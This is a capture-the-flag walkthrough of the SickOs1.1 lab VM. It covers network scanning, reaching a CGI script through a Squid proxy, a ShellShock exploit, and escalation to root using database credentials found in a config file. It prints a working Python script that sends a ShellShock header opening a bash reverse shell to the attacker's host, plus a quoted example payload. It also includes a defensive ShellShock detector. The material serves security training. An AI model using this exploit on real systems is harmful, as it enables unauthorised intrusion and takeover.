Description
This CTF gives a clear analogy of how hacking strategies can be performed on a network to compromise it in a safe environment. This VM is very similar to labs I faced in OSCP. The objective is to compromise the network/machine and gain Administrative/root privileges on it.
About Release
- Name: SickOs1.1
- Date Release: 11 Dec 2015
- Author: D4rk
- Series: SickOs
- Objective: Get /root/a0216ea4d51874464078c618298b1367.txt
- Tester(s): h1tch1
- Twitter: https://twitter.com/D4rk36
Recognition
First we identify the IP of our target with arp-scan.
sudo arp-scan -I eth0 --localnet --ignoredups
Our target is 192.168.128.132
We proceed with an nmap scan to see which ports are open, and we discover ports 22 and 3128.
nmap -p- --open -sT -vvv --min-rate 5000 -n -Pn 192.168.128.132 -oG allPorts
Not shown: 65532 filtered tcp ports (no-response), 1 closed tcp port (conn-refused)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack
3128/tcp open  squid-http syn-ack
Data we extract from the reconnaissance:
- Port 3128 is open and runs squid-http
- The remaining ports are filtered
Let's do some research on the Squid server:
Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. It reduces bandwidth and improves response times by caching and reusing frequently-requested web pages. Squid has extensive access controls and makes a great server accelerator. It runs on most available operating systems, including Windows and is licensed under the GNU GPL. (Web definition)
So we know that this port is acting as a proxy, which suggests a web server is running on port 80 behind Squid:
We try to curl the IP through the Squid proxy on port 3128, the port we found open.
Now we can try to list directories using the proxy.
When we discover a cgi-bin directory we are alerted, because if it exists we are probably facing a CGI script vulnerable to ShellShock (ShellShock - CGI).
Let’s see if we get anything else from this dir:
We searched the web for more information about ShellShock and found an old article (Shell Shock):
For example, if example.com were vulnerable, then
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
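As an added defensive example (not part of the original writeup), the "() { :; };" prefix seen in the curl above is the signature a proxy or web-server log review can key on. The request samples below are constructed, and the function names are my own:

```python
import re

# Signature of a ShellShock (CVE-2014-6271) trigger: a value that starts with a
# bash function definition "() { ... }" and carries trailing commands after the
# closing brace. Vulnerable bash matched the literal prefix "() {"; the regex
# allows optional whitespace so slightly varied values are still flagged.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{[^}]*\}\s*;\s*(.+)", re.DOTALL)


def shellshock_payload(header_value):
    """Return the trailing command string if header_value carries a ShellShock
    function-definition prefix, otherwise None."""
    m = SHELLSHOCK_RE.search(header_value)
    return m.group(1).strip() if m else None


def scan_requests(requests):
    """requests: iterable of (path, headers) tuples, headers a dict.
    Returns a list of (path, header name, trailing command) for each header
    whose value matches the signature. CGI copies every request header into
    the environment (HTTP_USER_AGENT, HTTP_REFERER, ...), so all headers are
    checked, not just User-Agent."""
    hits = []
    for path, headers in requests:
        for name, value in headers.items():
            cmd = shellshock_payload(value)
            if cmd is not None:
                hits.append((path, name, cmd))
    return hits


# Constructed sample traffic (not captured from the SickOs machine): two
# ordinary requests and two carrying the function-definition prefix.
SAMPLE_REQUESTS = [
    ("/", {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"}),
    ("/cgi-bin/status", {"User-Agent": "curl/7.68.0"}),
    ("/cgi-bin/status", {"User-Agent": "() { :; }; /bin/eject"}),
    ("/cgi-bin/status", {"Referer": "() { :;}; echo vulnerable",
                         "User-Agent": "curl/7.68.0"}),
]

if __name__ == "__main__":
    for path, name, cmd in scan_requests(SAMPLE_REQUESTS):
        print(f"ShellShock attempt on {path}: header {name} -> {cmd!r}")
```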
We try changing the command, keeping only the header format from the example:
Indeed we have command execution, so let's try to get a reverse shell through a Python script:
#!/usr/bin/python3
import sys, signal, requests
import threading
from pwn import *

# Exit cleanly on Ctrl+C
def def_handler(sig, frame):
    print("\n[!] - exiting... \n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

# Vulnerable CGI script, reached through the Squid proxy on port 3128
main_url = "http://192.168.128.132/cgi-bin/status"
squid_proxy = {"http": "http://192.168.128.132:3128"}

def shellshock_attack():
    # ShellShock function-definition prefix followed by the reverse-shell command;
    # the listener runs on the attacking machine at 192.168.128.131:443
    headers = {'User-Agent': "() { :; }; echo; /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.128.131/443 0>&1'"}
    r = requests.get(main_url, headers=headers, proxies=squid_proxy)

if __name__ == '__main__':
    try:
        threading.Thread(target=shellshock_attack, args=()).start()
    except Exception as e:
        log.error(str(e))
We run it while listening on the port chosen in the script:
We made it: we are inside the victim machine and can execute commands. Now we have to escalate our privileges.
We explore and find interesting info inside config.php in /var/www/wolfcms (that path was in robots.txt, but I decided not to explore that way).
Inside this file are the credentials to authenticate to the database; we have the user and password, which we can use to try to escalate privileges on the machine.
- User: ‘root’
- Password: ‘john@123’
The shell is limited, and if you google the following output the advice is to upgrade the shell.
We upgrade it and try to authenticate with the credentials found:
python -c 'import pty;pty.spawn("/bin/bash")'
It worked, we tried again and…
We are now root.
Flag found!